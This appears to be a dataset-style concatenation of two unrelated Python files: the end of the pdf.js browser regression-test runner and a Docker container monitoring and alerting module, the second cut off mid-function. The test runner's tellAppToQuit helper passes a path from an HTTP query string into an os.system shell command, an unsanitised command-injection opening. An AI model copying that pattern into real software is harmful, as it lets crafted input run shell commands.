# sort the results since they sometimes come in out of order
for results in taskResults:
results.sort(key=lambda result: result.page)
check(State.manifest[id], taskResults, browser,
self.server.masterMode)
# Please oh please GC this ...
del State.taskResults[browser][id]
State.remaining[browser] -= 1
checkIfDone()
def checkIfDone():
State.done = True
for key in State.remaining:
if State.remaining[key] != 0:
State.done = False
return
# Applescript hack to quit Chrome on Mac
def tellAppToQuit(path, query):
if platform.system() != "Darwin":
return
d = parse_qs(query)
path = d['path'][0]
cmd = """osascript<<END
tell application "%s"
quit
end tell
END""" % path
os.system(cmd)
class BaseBrowserCommand(object):
def __init__(self, browserRecord):
self.name = browserRecord["name"]
self.path = browserRecord["path"]
self.tempDir = None
self.process = None
if platform.system() == "Darwin" and (self.path.endswith(".app") or self.path.endswith(".app/")):
self._fixupMacPath()
if not os.path.exists(self.path):
raise Exception("Path to browser '%s' does not exist." % self.path)
def setup(self):
self.tempDir = tempfile.mkdtemp()
self.profileDir = os.path.join(self.tempDir, "profile")
self.browserLog = open(BROWSERLOG_FILE, "w")
def teardown(self):
self.process.terminate()
# If the browser is still running, wait up to ten seconds for it to quit
if self.process and self.process.poll() is None:
checks = 0
while self.process.poll() is None and checks < 20:
checks += 1
time.sleep(.5)
# If it's still not dead, try to kill it
if self.process.poll() is None:
print "Process %s is still running. Killing." % self.name
self.process.kill()
self.process.wait()
if self.tempDir is not None and os.path.exists(self.tempDir):
shutil.rmtree(self.tempDir)
self.browserLog.close()
def start(self, url):
raise Exception("Can't start BaseBrowserCommand")
class FirefoxBrowserCommand(BaseBrowserCommand):
def _fixupMacPath(self):
self.path = os.path.join(self.path, "Contents", "MacOS", "firefox-bin")
def setup(self):
super(FirefoxBrowserCommand, self).setup()
shutil.copytree(os.path.join(DOC_ROOT, "test", "resources", "firefox"),
self.profileDir)
def start(self, url):
cmds = [self.path]
if platform.system() == "Darwin":
cmds.append("-foreground")
cmds.extend(["-no-remote", "-profile", self.profileDir, url])
self.process = subprocess.Popen(cmds, stdout = self.browserLog, stderr = self.browserLog)
class ChromeBrowserCommand(BaseBrowserCommand):
def _fixupMacPath(self):
self.path = os.path.join(self.path, "Contents", "MacOS", "Google Chrome")
def start(self, url):
cmds = [self.path]
cmds.extend(["--user-data-dir=%s" % self.profileDir,
"--no-first-run", "--disable-sync", url])
self.process = subprocess.Popen(cmds, stdout = self.browserLog, stderr = self.browserLog)
def makeBrowserCommand(browser):
path = browser["path"].lower()
name = browser["name"]
if name is not None:
name = name.lower()
types = {"firefox": FirefoxBrowserCommand,
"chrome": ChromeBrowserCommand }
command = None
for key in types.keys():
if (name and name.find(key) > -1) or path.find(key) > -1:
command = types[key](browser)
command.name = command.name or key
break
if command is None:
raise Exception("Unrecognized browser: %s" % browser)
return command
def makeBrowserCommands(browserManifestFile):
with open(browserManifestFile) as bmf:
browsers = [makeBrowserCommand(browser) for browser in json.load(bmf)]
return browsers
def downloadLinkedPDF(f):
linkFile = open(f +'.link')
link = linkFile.read()
linkFile.close()
sys.stdout.write('Downloading '+ link +' to '+ f +' ...')
sys.stdout.flush()
response = urllib2.urlopen(link)
with open(f, 'wb') as out:
out.write(response.read())
print 'done'
def downloadLinkedPDFs(manifestList):
for item in manifestList:
f, isLink = item['file'], item.get('link', False)
if isLink and not os.access(f, os.R_OK):
try:
downloadLinkedPDF(f)
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
print 'ERROR: Unable to download file "' + f + '".'
open(f, 'wb').close()
with open(f + '.error', 'w') as out:
out.write('\n'.join(traceback.format_exception(exc_type,
exc_value,
exc_traceback)))
def verifyPDFs(manifestList):
error = False
for item in manifestList:
f = item['file']
if os.path.isfile(f + '.error'):
print 'WARNING: File was not downloaded. See "' + f + '.error" file.'
error = True
elif os.access(f, os.R_OK):
fileMd5 = hashlib.md5(open(f, 'rb').read()).hexdigest()
if 'md5' not in item:
print 'WARNING: Missing md5 for file "' + f + '".',
print 'Hash for current file is "' + fileMd5 + '"'
error = True
continue
md5 = item['md5']
if fileMd5 != md5:
print 'WARNING: MD5 of file "' + f + '" does not match file.',
print 'Expected "' + md5 + '" computed "' + fileMd5 + '"'
error = True
continue
else:
print 'WARNING: Unable to open file for reading "' + f + '".'
error = True
return not error
def getTestBrowsers(options):
testBrowsers = []
if options.browserManifestFile:
testBrowsers = makeBrowserCommands(options.browserManifestFile)
elif options.browser:
testBrowsers = [makeBrowserCommand({"path":options.browser, "name":None})]
if options.browserManifestFile or options.browser:
assert len(testBrowsers) > 0
return testBrowsers
def setUp(options):
# Only serve files from a pdf.js clone
assert not GIT_CLONE_CHECK or os.path.isfile('../src/pdf.js') and os.path.isdir('../.git')
if options.masterMode and os.path.isdir(TMPDIR):
print 'Temporary snapshot dir tmp/ is still around.'
print 'tmp/ can be removed if it has nothing you need.'
if options.noPrompts or prompt('SHOULD THIS SCRIPT REMOVE tmp/? THINK CAREFULLY'):
subprocess.call(( 'rm', '-rf', 'tmp' ))
assert not os.path.isdir(TMPDIR)
testBrowsers = getTestBrowsers(options)
with open(options.manifestFile) as mf:
manifestList = json.load(mf)
if not options.noDownload:
downloadLinkedPDFs(manifestList)
if not verifyPDFs(manifestList):
print 'Unable to verify the checksum for the files that are used for testing.'
print 'Please re-download the files, or adjust the MD5 checksum in the manifest for the files listed above.\n'
for b in testBrowsers:
State.taskResults[b.name] = { }
State.remaining[b.name] = len(manifestList)
State.lastPost[b.name] = int(time.time())
for item in manifestList:
id, rounds = item['id'], int(item['rounds'])
State.manifest[id] = item
taskResults = [ ]
for r in xrange(rounds):
taskResults.append([ ])
State.taskResults[b.name][id] = taskResults
if options.statsFile != None:
State.saveStats = True
return testBrowsers
def setUpUnitTests(options):
# Only serve files from a pdf.js clone
assert not GIT_CLONE_CHECK or os.path.isfile('../src/pdf.js') and os.path.isdir('../.git')
testBrowsers = getTestBrowsers(options)
UnitTestState.browsersRunning = len(testBrowsers)
for b in testBrowsers:
UnitTestState.lastPost[b.name] = int(time.time())
return testBrowsers
def startBrowsers(browsers, options, path):
for b in browsers:
b.setup()
print 'Launching', b.name
host = 'http://%s:%s' % (SERVER_HOST, options.port)
qs = '?browser='+ urllib.quote(b.name) +'&manifestFile='+ urllib.quote(options.manifestFile)
qs += '&path=' + b.path
qs += '&delay=' + str(options.statsDelay)
qs += '&masterMode=' + str(options.masterMode)
b.start(host + path + qs)
def teardownBrowsers(browsers):
for b in browsers:
try:
b.teardown()
except:
print "Error cleaning up after browser at ", b.path
print "Temp dir was ", b.tempDir
print "Error:", sys.exc_info()[0]
def check(task, results, browser, masterMode):
failed = False
for r in xrange(len(results)):
pageResults = results[r]
for p in xrange(len(pageResults)):
pageResult = pageResults[p]
if pageResult is None:
continue
failure = pageResult.failure
if failure:
failed = True
if os.path.isfile(task['file'] + '.error'):
print 'TEST-SKIPPED | PDF was not downloaded', task['id'], '| in', browser, '| page', p + 1, 'round', r, '|', failure
else:
State.numErrors += 1
print 'TEST-UNEXPECTED-FAIL | test failed', task['id'], '| in', browser, '| page', p + 1, 'round', r, '|', failure
if failed:
return
kind = task['type']
if 'eq' == kind or 'text' == kind:
checkEq(task, results, browser, masterMode)
elif 'fbf' == kind:
checkFBF(task, results, browser)
elif 'load' == kind:
checkLoad(task, results, browser)
else:
assert 0 and 'Unknown test type'
def createDir(dir):
try:
os.makedirs(dir)
except OSError, e:
if e.errno != 17: # file exists
print >>sys.stderr, 'Creating', dir, 'failed!'
def readDataUri(data):
metadata, encoded = data.rsplit(",", 1)
return base64.b64decode(encoded)
def checkEq(task, results, browser, masterMode):
pfx = os.path.join(REFDIR, sys.platform, browser, task['id'])
testSnapshotDir = os.path.join(TEST_SNAPSHOTS, sys.platform, browser, task['id'])
results = results[0]
taskId = task['id']
taskType = task['type']
passed = True
for result in results:
page = result.page
snapshot = readDataUri(result.snapshot)
ref = None
eq = True
path = os.path.join(pfx, str(page) + '.png')
if not os.access(path, os.R_OK):
State.numEqNoSnapshot += 1
if not masterMode:
print 'WARNING: no reference snapshot', path
else:
f = open(path, 'rb')
ref = f.read()
f.close()
eq = (ref == snapshot)
if not eq:
print 'TEST-UNEXPECTED-FAIL |', taskType, taskId, '| in', browser, '| rendering of page', page, '!= reference rendering'
if not State.eqLog:
State.eqLog = open(EQLOG_FILE, 'w')
eqLog = State.eqLog
createDir(testSnapshotDir)
testSnapshotPath = os.path.join(testSnapshotDir, str(page) + '.png')
handle = open(testSnapshotPath, 'wb')
handle.write(snapshot)
handle.close()
refSnapshotPath = os.path.join(testSnapshotDir, str(page) + '_ref.png')
handle = open(refSnapshotPath, 'wb')
handle.write(ref)
handle.close()
# NB: this follows the format of Mozilla reftest
# output so that we can reuse its reftest-analyzer
# script
eqLog.write('REFTEST TEST-UNEXPECTED-FAIL | ' + browser +'-'+ taskId +'-page'+ str(page) + ' | image comparison (==)\n')
eqLog.write('REFTEST IMAGE 1 (TEST): ' + testSnapshotPath + '\n')
eqLog.write('REFTEST IMAGE 2 (REFERENCE): ' + refSnapshotPath + '\n')
passed = False
State.numEqFailures += 1
if masterMode and (ref is None or not eq):
tmpTaskDir = os.path.join(TMPDIR, sys.platform, browser, task['id'])
createDir(tmpTaskDir)
handle = open(os.path.join(tmpTaskDir, str(page)) + '.png', 'wb')
handle.write(snapshot)
handle.close()
if passed:
print 'TEST-PASS |', taskType, 'test', task['id'], '| in', browser
def checkFBF(task, results, browser):
round0, round1 = results[0], results[1]
assert len(round0) == len(round1)
passed = True
for page in xrange(len(round1)):
r0Page, r1Page = round0[page], round1[page]
if r0Page is None:
break
if r0Page.snapshot != r1Page.snapshot:
print 'TEST-UNEXPECTED-FAIL | forward-back-forward test', task['id'], '| in', browser, '| first rendering of page', page + 1, '!= second'
passed = False
State.numFBFFailures += 1
if passed:
print 'TEST-PASS | forward-back-forward test', task['id'], '| in', browser
def checkLoad(task, results, browser):
# Load just checks for absence of failure, so if we got here the
# test has passed
print 'TEST-PASS | load test', task['id'], '| in', browser
def processResults(options):
print ''
numFatalFailures = (State.numErrors + State.numFBFFailures)
if 0 == State.numEqFailures and 0 == numFatalFailures:
print 'All regression tests passed.'
else:
print 'OHNOES! Some tests failed!'
if 0 < State.numErrors:
print ' errors:', State.numErrors
if 0 < State.numEqFailures:
print ' different ref/snapshot:', State.numEqFailures
if 0 < State.numFBFFailures:
print ' different first/second rendering:', State.numFBFFailures
if options.statsFile != None:
with open(options.statsFile, 'w') as sf:
sf.write(json.dumps(State.stats, sort_keys=True, indent=4))
print 'Wrote stats file: ' + options.statsFile
def maybeUpdateRefImages(options, browser):
if options.masterMode and (0 < State.numEqFailures or 0 < State.numEqNoSnapshot):
print "Some eq tests failed or didn't have snapshots."
print 'Checking to see if master references can be updated...'
numFatalFailures = (State.numErrors + State.numFBFFailures)
if 0 < numFatalFailures:
print ' No. Some non-eq tests failed.'
else:
print ' Yes! The references in tmp/ can be synced with ref/.'
if options.reftest:
startReftest(browser, options)
if options.noPrompts or prompt('Would you like to update the master copy in ref/?'):
sys.stdout.write(' Updating ref/ ... ')
if not os.path.exists('ref'):
subprocess.check_call('mkdir ref', shell = True)
subprocess.check_call('cp -Rf tmp/* ref/', shell = True)
print 'done'
else:
print ' OK, not updating.'
def startReftest(browser, options):
url = "http://%s:%s" % (SERVER_HOST, options.port)
url += "/test/resources/reftest-analyzer.xhtml"
url += "#web=/test/eq.log"
try:
browser.setup()
browser.start(url)
print "Waiting for browser..."
browser.process.wait()
finally:
teardownBrowsers([browser])
print "Completed reftest usage."
def runTests(options, browsers):
try:
shutil.rmtree(TEST_SNAPSHOTS);
except OSError, e:
if e.errno != 2: # folder doesn't exist
print >>sys.stderr, 'Deleting', dir, 'failed!'
t1 = time.time()
try:
startBrowsers(browsers, options, '/test/test_slave.html')
while not State.done:
for b in State.lastPost:
if State.remaining[b] > 0 and int(time.time()) - State.lastPost[b] > BROWSER_TIMEOUT:
print 'TEST-UNEXPECTED-FAIL | test failed', b, "has not responded in", BROWSER_TIMEOUT, "s"
State.numErrors += State.remaining[b]
State.remaining[b] = 0
checkIfDone()
time.sleep(1)
processResults(options)
finally:
teardownBrowsers(browsers)
t2 = time.time()
print "Runtime was", int(t2 - t1), "seconds"
if State.eqLog:
State.eqLog.close();
if options.masterMode:
maybeUpdateRefImages(options, browsers[0])
elif options.reftest and State.numEqFailures > 0:
print "\nStarting reftest harness to examine %d eq test failures." % State.numEqFailures
startReftest(browsers[0], options)
def runUnitTests(options, browsers, url, name):
t1 = time.time()
try:
startBrowsers(browsers, options, url)
while UnitTestState.browsersRunning > 0:
for b in UnitTestState.lastPost:
if UnitTestState.lastPost[b] != None and int(time.time()) - UnitTestState.lastPost[b] > BROWSER_TIMEOUT:
print 'TEST-UNEXPECTED-FAIL | test failed', b, "has not responded in", BROWSER_TIMEOUT, "s"
UnitTestState.lastPost[b] = None
UnitTestState.browsersRunning -= 1
UnitTestState.numErrors += 1
time.sleep(1)
print ''
print 'Ran', UnitTestState.numRun, 'tests'
if UnitTestState.numErrors > 0:
print 'OHNOES! Some', name, 'tests failed!'
print ' ', UnitTestState.numErrors, 'of', UnitTestState.numRun, 'failed'
else:
print 'All', name, 'tests passed.'
finally:
teardownBrowsers(browsers)
t2 = time.time()
print '', name, 'tests runtime was', int(t2 - t1), 'seconds'
def main():
optionParser = TestOptions()
options, args = optionParser.parse_args()
options = optionParser.verifyOptions(options)
if options == None:
sys.exit(1)
if options.unitTest or options.fontTest:
httpd = TestServer((SERVER_HOST, options.port), UnitTestHandler)
httpd_thread = threading.Thread(target=httpd.serve_forever)
httpd_thread.setDaemon(True)
httpd_thread.start()
browsers = setUpUnitTests(options)
if len(browsers) > 0:
if options.unitTest:
runUnitTests(options, browsers, '/test/unit/unit_test.html', 'unit')
if options.fontTest:
runUnitTests(options, browsers, '/test/font/font_test.html', 'font')
else:
httpd = TestServer((SERVER_HOST, options.port), PDFTestHandler)
httpd.masterMode = options.masterMode
httpd_thread = threading.Thread(target=httpd.serve_forever)
httpd_thread.setDaemon(True)
httpd_thread.start()
browsers = setUp(options)
if len(browsers) > 0:
runTests(options, browsers)
else:
# just run the server
print "Running HTTP server. Press Ctrl-C to quit."
try:
while True:
time.sleep(1)
except (KeyboardInterrupt):
print "\nExiting."
if __name__ == '__main__':
main()
|
mdocker.py
|
#!/usr/bin/env python
#-*- encoding: utf-8 -*-
from datetime import datetime
from config import *
from . import mdb, apush
dclient = variant.dclient
def get_dkinfo():
try:
dclient.ping()
except Exception as e:
return {"errmsg": str(e)}
dkinfo = dclient.info()
cpu_usage, mem_usage = get_cm_usage()
retval = {
'URI': '',
'ID': utils.get_sha1(dkinfo['ID']),
'Name': dkinfo['Name'],
'ProductLicense': dkinfo.get('ProductLicense',''),
'ServerVersion': dkinfo['ServerVersion'],
'SystemTime': formator.get_ts_from_utcstr(dkinfo['SystemTime']),
'NCPU': dkinfo['NCPU'], 'CpuUsage': cpu_usage,
'MemTotal': dkinfo['MemTotal'], 'MemUsage': mem_usage,
'OperatingSystem': dkinfo['OperatingSystem'],
'OSType': dkinfo['OSType'],
'Images': dkinfo['Images'],
'Containers': dkinfo['Containers'],
}
return retval
def dict_container(cobj):
if isinstance(cobj, docker.models.containers.Container):
return {
'short_id': cobj.short_id,
'name': cobj.name,
'image': cobj.attrs['Config']['Image'],
'status': cobj.status,
'Created': int(formator.get_ts_from_utcstr(cobj.attrs['Created'])),
'StartedAt': formator.get_docker_status(cobj.attrs['State']['Running'], cobj.attrs['State']['ExitCode'], cobj.attrs['State']['StartedAt']),
'ports': ','.join(set([x.split('/')[0] for x in cobj.ports.keys()])),
}
elif isinstance(cobj, dict):
return {
'short_id': cobj['Id'][:10],
'name': cobj['Names'][0][1:],
'image': cobj['Image'],
'status': cobj['State'],
'Created': cobj['Created'],
'StartedAt': cobj['Status'],
'ports': ','.join(set(['%s'%(x['PublicPort']) for x in cobj['Ports'] if 'PublicPort' in x and 'Type' in x])),
}
else:
return {}
def list_container():
try:
retval = [dict_container(x) for x in dclient.api.containers(all=True)]
except Exception as e:
retval = []
return retval
def exists_container(cname):
try:
retval = [x for x in dclient.api.containers(all=True) if x['Names'][0][1:]==cname]
except Exception as e:
retval = []
return bool(retval)
def get_container(cname):
try:
return dict_container(get_dct_container(cname))
except Exception as e:
traceback.print_exc()
return {"errmsg":e}
def get_dct_container(cname):
try:
retval = [x for x in dclient.api.containers(all=True) if x['Names'][0][1:]==cname]
except Exception as e:
retval = []
if not retval:
raise docker.errors.NotFound("No such container: %s"%cname)
else:
return retval[0]
def start_container(cname):
try:
dclient.containers.get(cname).start()
return dict_container(get_dct_container(cname))
except Exception as e:
traceback.print_exc()
return {"errmsg":e}
def restart_container(cname):
try:
dclient.containers.get(cname).restart()
return dict_container(get_dct_container(cname))
except Exception as e:
traceback.print_exc()
return {"errmsg":e}
def stop_container(cname):
try:
dclient.containers.get(cname).stop()
return dict_container(get_dct_container(cname))
except Exception as e:
traceback.print_exc()
return {"errmsg":e}
def remove_container(cname):
try:
dclient.api.remove_container(cname, v=True, force=True)
return {"errmsg":""}
except Exception as e:
traceback.print_exc()
return {"errmsg":e}
def inspect_container(cname):
try:
cobj = dclient.containers.get(cname)
cdct = get_dct_container(cname)
nets = [(key, val) for key, val in utils.copy_dict(cobj.attrs['NetworkSettings'], ['IPAddress', 'Gateway']).items()]
if (not nets or not nets[0] or not nets[0][1] ) and cobj.attrs['HostConfig']['NetworkMode'] in cobj.attrs['NetworkSettings']['Networks']:
nets = [(key, val) for key, val in utils.copy_dict(cobj.attrs['NetworkSettings']['Networks'][ cobj.attrs['HostConfig']['NetworkMode'] ], ['IPAddress', 'Gateway']).items()]
return {"body":{
'Cmd': cdct['Command'],
'Env': [x.split('=') for x in cobj.attrs['Config']['Env']],
'Mounts': [utils.copy_dict(x, ['Source', 'Destination', 'Mode']) for x in cobj.attrs['Mounts']],
'Networks': nets,
'Ports': [(key, '%s:%s'%(val[0]['HostIp'],val[0]['HostPort'])) for key, val in cobj.attrs['NetworkSettings']['Ports'].items() if val],
}}
except Exception as e:
traceback.print_exc()
return {"errmsg":e}
def logs_container_tail(cname, lines):
try:
retdat = dclient.api.logs(cname, tail=lines, timestamps=True).decode().strip()
retdat = [x3.strip().split(' ', 1) for x1 in retdat.split('\n') for x2 in x1.split('\r') for x3 in x2.split('\r\n') if x3.strip()]
return {'body':retdat}
except Exception as e:
traceback.print_exc()
return {'errmsg':str(e)}
def logs_container_forward(cname, lines, tsbase):
from datetime import datetime, timedelta
try:
cdct = get_dct_container(cname)
if len(tsbase)==30 and tsbase.startswith('20') and tsbase.endswith('Z'):
dtbase = datetime.fromisoformat(tsbase[:26])
else:
dtbase = datetime.fromisoformat(tsbase)
retdat = recurse_forward(cname, cdct['Created'], dtbase, lines, -1, [])
retdat = [x for x in retdat if x[0]<tsbase]
retval = retdat[-lines:]
return {'body':retval}
except Exception as e:
traceback.print_exc()
return {'errmsg':str(e)}
def recurse_forward(cname, createtime, dtbase, lines, movedays, retval=[]):
from datetime import datetime, timedelta
dt1, dt2 = dtbase+timedelta(days=movedays), dtbase+timedelta(seconds=1)
retdat = dclient.api.logs(cname, timestamps=True, since=dt1, until=dt2).decode().strip()
retdat = [x3.strip().split(' ', 1) for x1 in retdat.split('\n') for x2 in x1.split('\r') for x3 in x2.split('\r\n') if x3.strip()]
retval = retdat + retval
if (lines=='all' or len(retval) < int(lines)) and dt2.timestamp() > createtime:
retval = recurse_forward(cname, createtime, dt1, lines, movedays*2, retval)
return retval
def logs_container_backward(cname, lines, tsbase):
from datetime import datetime, timedelta
try:
cdct = get_dct_container(cname)
if len(tsbase)==30 and tsbase.startswith('20') and tsbase.endswith('Z'):
dtbase = datetime.fromisoformat(tsbase[:26])
else:
dtbase = datetime.fromisoformat(tsbase)
lastdata = logs_container_tail(cname, 1)
tslast = lastdata['body'][0][0] if lastdata.get('body') else ''
retdat = recurse_backward(cname, tslast, dtbase, lines, 1, [])
retdat = [x for x in retdat if x[0]>tsbase]
retval = retdat[:lines]
return {'body':retval}
except Exception as e:
traceback.print_exc()
return {'errmsg':str(e)}
def recurse_backward(cname, tslast, dtbase, lines, movedays, retval=[]):
from datetime import datetime, timedelta
dt1, dt2 = dtbase, dtbase+timedelta(days=movedays)
retdat = dclient.api.logs(cname, timestamps=True, since=dt1, until=dt2).decode().strip()
retdat = [x3.strip().split(' ', 1) for x1 in retdat.split('\n') for x2 in x1.split('\r') for x3 in x2.split('\r\n') if x3.strip()]
retval = retval + retdat
if (lines=='all' or len(retval) < int(lines)) and (len(retval)>0 and retval[-1][0]<tslast):
retval = recurse_backward(cname, tslast, dt2, lines, movedays*2, retval)
return retval
def avg(l):
r = [x for x in l if x != None]
if len(r) == 0:
return 0
else:
return sum(r)/len(r)
def nsum(l):
r = [x for x in l if x != None]
return sum(r)
def container_exists_byname(cname):
return cname in [cobj['Names'][0][1:] for cobj in dclient.api.containers(all=True)]
def get_stat_mindata(ts='0'):
cnames = [x['name'] for x in list_container()]
if ts and formator.isFloat(ts):
ff = lambda val : [x for x in val if x[0]>float(ts)]
retval = dict([(cname,ff(val)) for cname, val in variant.mindata.items() if cname in cnames])
else:
retval = dict([(cname,val) for cname, val in variant.mindata.items() if cname in cnames])
return retval
def get_cm_usage(cname=''):
alldata = get_stat_mindata()
retdat1 = [datas[-1][1] for key, datas in alldata.items() if (key==cname or cname=='') and len(datas)>0 and len(datas[-1])==12]
retdat2 = [datas[-1][2] for key, datas in alldata.items() if (key==cname or cname=='') and len(datas)>0 and len(datas[-1])==12]
return sum(retdat1), sum(retdat2)
def get_top6_mindata(ts='0'):
from functools import cmp_to_key
alldata = get_stat_mindata(ts)
top6name = []
for cname in alldata.keys():
top6name.append([cname, alldata[cname][-1][2] if len(alldata[cname])>0 and len(alldata[cname][-1])>2 else 0])
top6name.sort(key=cmp_to_key(lambda a, b: b[1]-a[1]))
retval = {}
count = 1
for cname, fake in top6name:
retval[cname] = alldata.pop(cname, [])
count += 1
if count>=6: break
timearray = []
for cname, tmpl in alldata.items():
timearray.extend([x[0] for x in tmpl])
timearray = list(set(timearray))
timearray.sort()
retval['Others'] = {}
for cname, tmpl in alldata.items():
for curritem in tmpl:
currtime = curritem[0]
saveitem = retval['Others'].get(currtime)
if not saveitem:
retval['Others'][currtime] = curritem
else:
retval['Others'][currtime] = [
currtime,
round(saveitem[1] + curritem[1], 2),
saveitem[2] + curritem[2],
saveitem[3] + curritem[3],
saveitem[4] + curritem[4],
saveitem[5] + curritem[5],
saveitem[6] + curritem[6],
saveitem[7] + curritem[7],
saveitem[8] + curritem[8],
saveitem[9] + curritem[9],
saveitem[10] + curritem[10],
saveitem[11] + curritem[11],
]
retval['Others'] = list(retval['Others'].values())
retval['Others'].sort(key=cmp_to_key(lambda a, b: a[0]-b[0]))
return retval
def stat_container(cname):
ster = variant.staters[cname]
try:
return next(ster)
except StopIteration as e:
utils.outMessage('Stat StopIteration: %s'%cname)
if container_exists_byname(cname):
ster = dclient.api.stats(cname, decode=True)
variant.staters[cname] = ster
else:
variant.staters.pop(cname)
except docker.errors.NotFound as e:
utils.outMessage('Stat NotFound: %s'%cname)
variant.staters.pop(cname)
except Exception as e:
utils.outMessage('Stat Exception: %s'%cname)
variant.staters.pop(cname)
def stat_transfer(cname, sdat):
rdat = None
if sdat and sdat.get('pids_stats') and sdat.get('cpu_stats'):
cs = sdat['cpu_stats']
ds = sdat.get('blkio_stats',{}).get('io_service_bytes_recursive',[])
ldat = variant.secdata[cname][-1] if variant.secdata[cname] else []
stime = formator.get_ts_from_utcstr(sdat['read'])
if stime==0 and ldat:
stime = ldat[0]+1
rdat = [
stime,
round(cs['cpu_usage']['total_usage']/cs['system_cpu_usage']*100,2),
sdat['memory_stats']['usage'],
round(sdat['memory_stats']['usage']/sdat['memory_stats']['limit']*100,2),
sdat['networks']['eth0']['rx_bytes'] if 'networks' in sdat else 0,
sdat['networks']['eth0']['tx_bytes'] if 'networks' in sdat else 0,
None,
None,
sum([x['value'] for x in ds if x['op']=='Read']),
sum([x['value'] for x in ds if x['op']=='Write']),
None,
None,
]
if ldat:
rdat[6] = rdat[4]-ldat[4] if rdat[4]>=ldat[4] else rdat[4]
rdat[7] = rdat[5]-ldat[5] if rdat[5]>=ldat[5] else rdat[5]
rdat[10] = rdat[8]-ldat[8] if rdat[8]>=ldat[8] else rdat[8]
rdat[11] = rdat[9]-ldat[9] if rdat[9]>=ldat[9] else rdat[9]
variant.secdata[cname].append(rdat)
return rdat
def stat_carry2minute(cname):
if not variant.secdata[cname]: return
st1 = variant.secdata[cname][0][0]
st2 = variant.secdata[cname][-1][0]
if st2-st1>60:
tmpl = []
cmin = datetime.fromtimestamp(variant.secdata[cname][0][0]).minute
lmin = cmin
while len(variant.secdata[cname])>0 and lmin==cmin:
tmpl.append(variant.secdata[cname].pop(0))
if len(variant.secdata[cname])>0:
cmin = datetime.fromtimestamp(variant.secdata[cname][0][0]).minute
if tmpl:
tsec = datetime.fromtimestamp(tmpl[0][0]).second
mdat = [
tmpl[0][0]-tsec,
round(avg([x[1] for x in tmpl]),2),
round(avg([x[2] for x in tmpl])),
round(avg([x[3] for x in tmpl]),2),
tmpl[-1][4],
tmpl[-1][5],
nsum([x[6] for x in tmpl]),
nsum([x[7] for x in tmpl]),
tmpl[-1][8],
tmpl[-1][9],
nsum([x[10] for x in tmpl]),
nsum([x[11] for x in tmpl]),
]
variant.mindata[cname].append(mdat)
return mdat
def stat_carry2hour(cname):
if not variant.mindata[cname]: return
st1 = variant.mindata[cname][0][0]
st2 = variant.mindata[cname][-1][0]
if st2-st1>2*3600 or time.time()-st1>2*3600:
tmpl = []
hmin = datetime.fromtimestamp(variant.mindata[cname][0][0]).hour
lmin = hmin
while len(variant.mindata[cname])>0 and lmin==hmin:
tmpl.append(variant.mindata[cname].pop(0))
if len(variant.mindata[cname])>0:
hmin = datetime.fromtimestamp(variant.mindata[cname][0][0]).hour
if tmpl:
tmin = datetime.fromtimestamp(tmpl[0][0]).minute
tsec = datetime.fromtimestamp(tmpl[0][0]).second + tmin*60
hdat = [
tmpl[0][0]-tsec,
round(avg([x[1] for x in tmpl]),2),
round(avg([x[2] for x in tmpl])),
round(avg([x[3] for x in tmpl]),2),
tmpl[-1][4],
tmpl[-1][5],
nsum([x[6] for x in tmpl]),
nsum([x[7] for x in tmpl]),
tmpl[-1][8],
tmpl[-1][9],
nsum([x[10] for x in tmpl]),
nsum([x[11] for x in tmpl]),
]
mdb.insert_stats(cname, hdat)
def stat_run_once():
for cname in list(variant.staters.keys()):
sdat = stat_container(cname)
stat_transfer(cname, sdat)
mdat = stat_carry2minute(cname)
alert_watch_2345(cname, mdat)
if mdat and variant.alertcm.get('--sys--'):
cpusum = sum([v[-1][1] for v in variant.mindata.values() if v])
memsum = sum([v[-1][2] for v in variant.mindata.values() if v])
fakemdat = [time.time(), cpusum, memsum]
alert_watch_2345('--sys--', fakemdat)
stat_carry2hour(cname)
def stat_init():
stat_keepiters()
cnames = variant.staters.keys()
fpath = utils.prefixStorageDir('stats.cache')
if os.path.isfile(fpath):
with open(fpath) as fobj:
savdat = formator.json_object(fobj.read())
if 'secdata' in savdat:
variant.secdata = savdat.get('secdata', {})
for key in list(variant.secdata.keys()):
if key not in cnames:
variant.secdata.pop(key)
else:
variant.secdata = dict([(x, []) for x in variant.staters.keys()])
if 'mindata' in savdat:
variant.mindata = savdat.get('mindata', {})
for key in list(variant.mindata.keys()):
if key not in cnames:
variant.mindata.pop(key)
else:
variant.mindata = dict([(x, []) for x in variant.staters.keys()])
def stat_closeall():
variant.staters = {}
savdat = formator.json_string({'secdata': variant.secdata, 'mindata':variant.mindata})
with open(utils.prefixStorageDir('stats.cache'),'w+') as fobj:
fobj.write(savdat)
def stat_keepiters():
for cobj in dclient.api.containers(all=True):
cname = cobj['Names'][0][1:]
if cname not in variant.staters:
variant.staters[cname] = dclient.api.stats(cname, decode=True)
if cname not in variant.secdata:
variant.secdata[cname] = []
if cname not in variant.mindata:
variant.mindata[cname] = []
def logs_classall():
variant.logiers = {}
def logs_keepiters():
needskey = list(variant.alertlg.keys())
for key in list(variant.logiers.keys()):
if key not in needskey:
variant.logiers[key].close()
variant.logiers.pop(key)
for cname in needskey:
if cname not in variant.logiers:
try:
cobj = get_container(cname)
if cobj.get('status') == 'running':
variant.logiers[cname] = dclient.api.logs(cname, stream=True, timestamps=True, tail=0)
except Exception as e:
traceback.print_exc()
if cname not in variant.logthds:
variant.logthds[cname] = threading.Thread(target=logs_run_once, args=(cname,), daemon=True)
variant.logthds[cname].start()
def logs_run_once(cname):
while True:
if cname not in variant.logiers: break
if cname not in variant.alertlg: break
time.sleep(0.1)
try:
logtxt = variant.logiers[cname].next().decode()
logtxt = logtxt.split(' ',1)
timestamp = logtxt[0] if len(logtxt)==2 else ''
content = logtxt[1] if len(logtxt)==2 else logtxt[0]
for aobj in variant.alertlg[cname]:
needtest = 'LASTRUNTIME' not in aobj or time.time()-aobj.LASTRUNTIME>60
if not needtest:
continue
match = re.match(aobj.ALSTR, content)
aobj.LASTRUNTIME = time.time()
if (match or content.find(aobj.ALSTR)>=0) and (content.find('INSERT INTO DM_MESSAGE')<0):
aobj.LASTALERTTIME = aobj.LASTRUNTIME
aobj.ALERTCOUNT = aobj.get('ALERTCOUNT', 0) + 1
testmsg = {"ALID": aobj.ALID, "ISPUSHED": aobj.ALPUSH if aobj.ALPUSH==1 else 0, "MSGSTAMP":formator.get_ts_from_utcstr(timestamp)}
testmsg["MSGBODY"] = "%s Log keyword found: %s\n\n%s %s"%(cname, aobj.ALSTR, timestamp, content)
msgret = mdb.new_message(testmsg)
lobj = variant.pubkeys.get(aobj.LICENSEID,{})
